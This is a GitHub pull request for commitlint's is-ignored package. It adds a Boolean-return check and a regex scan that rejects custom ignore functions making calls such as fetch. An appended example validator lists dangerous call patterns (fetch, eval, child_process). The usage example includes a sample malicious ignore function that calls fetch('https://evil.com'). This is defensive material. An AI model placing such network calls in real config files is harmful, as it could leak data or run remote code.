
fix(is-ignored): introduce security validation for custom ignore functions #4258

Open

wants to merge 1 commit into base: master

Conversation

@edodusi commented Jan 21, 2025

Description

This PR improves security validation in the @commitlint/is-ignored package by introducing a regex pattern to catch potentially malicious function calls.

Motivation and Context

The current security validation in is-ignored only performs type validation on the Matcher; this PR adds a stricter check and throws if the function does not return a Boolean, plus it checks for potentially dangerous side effects (e.g., fetch("url")) that could potentially allow malicious code to be executed through custom ignore functions.

Usage examples

```js
// commitlint.config.js
module.exports = {
  ignores: [
    // This will now be caught as potentially dangerous
    commit => {
      fetch("https://evil.com");
      return true;
    },
    // This remains valid
    commit => commit.includes("fetch")
  ]
};
```

How Has This Been Tested?

  • Added new test cases for various malicious patterns in custom ignore functions
  • Added tests for safe patterns to ensure no false positives
  • Added tests to verify proper error messages
  • Verified all existing tests continue to pass
  • Manual testing with various function patterns

Types of changes

  • Bug fix (non-breaking change which fixes an issue)
  • New feature (non-breaking change which adds functionality)
  • Breaking change (fix or feature that would cause existing functionality to change)

Checklist:

  • My change requires a change to the documentation.
  • I have updated the documentation accordingly.
  • I have added tests to cover my changes.
  • All new and existing tests passed.
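The two checks the description outlines, a Boolean return-type check and a source-level scan for suspicious calls, can be illustrated with a small validation wrapper. The code below is an added example written for this page; it is not the @commitlint/is-ignored implementation or the code in this PR. The function names (`findDangerousCall`, `validateIgnoreMatcher`, `validateIgnores`), the pattern list in `DANGEROUS_CALL_PATTERN`, and the sample commit messages are all assumptions constructed for the example.

```javascript
// Added example, not @commitlint/is-ignored's own code: a wrapper that
// validates custom ignore matchers along the lines the PR describes, namely
// requiring a Boolean return value and flagging suspicious calls in the
// matcher's source text. The pattern list and function names are assumptions.

// Calls that a commit-message matcher has no reason to make (assumed list).
// Matches an identifier followed by an opening parenthesis, so the string
// literal "fetch" inside commit.includes("fetch") is not flagged.
const DANGEROUS_CALL_PATTERN =
  /\b(fetch|require|import|eval|process\.exit|child_process|XMLHttpRequest)\s*\(/;

// Inspect a matcher's source text for a flagged call pattern.
// Returns the matched snippet (e.g. "fetch(") or null when nothing is found.
function findDangerousCall(matcher) {
  if (typeof matcher !== "function") {
    throw new TypeError("ignore matcher must be a function");
  }
  const source = Function.prototype.toString.call(matcher);
  const hit = DANGEROUS_CALL_PATTERN.exec(source);
  return hit ? hit[0].trim() : null;
}

// Validate one matcher up front and wrap it so every call is checked:
// the source must not contain a flagged call, and the result must be a Boolean.
function validateIgnoreMatcher(matcher) {
  const dangerous = findDangerousCall(matcher);
  if (dangerous) {
    throw new Error(
      `ignore matcher contains potentially dangerous call: ${dangerous}`
    );
  }
  return (commit) => {
    const result = matcher(commit);
    if (typeof result !== "boolean") {
      throw new TypeError(
        `ignore matcher must return a Boolean, got ${typeof result}`
      );
    }
    return result;
  };
}

// Validate a whole `ignores` array, as a config loader might.
// Returns the wrapped matchers and throws on the first invalid entry.
function validateIgnores(ignores) {
  if (!Array.isArray(ignores)) {
    throw new TypeError("ignores must be an array of functions");
  }
  return ignores.map(validateIgnoreMatcher);
}

// Constructed usage: a safe matcher passes and is wrapped; a matcher that
// performs a network call is rejected before it is ever invoked.
const safeIgnore = validateIgnoreMatcher((commit) => commit.includes("fetch"));
console.log(safeIgnore("chore: add fetch wrapper")); // true
try {
  validateIgnoreMatcher((commit) => {
    fetch("https://example.invalid"); // placeholder URL, never called
    return true;
  });
} catch (err) {
  console.log(err.message);
}
```

The source scan is a heuristic over `Function.prototype.toString` output: it catches the obvious shape shown in the PR's usage example, but it is not a sandbox and cannot prove a matcher has no side effects, so it belongs alongside, not instead of, treating the commitlint config as trusted code. The return-type check, by contrast, is exact and runs on every invocation.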

This pull request is automatically built and testable in CodeSandbox.

To see build info of the built libraries, click here or the icon next to each commit SHA.
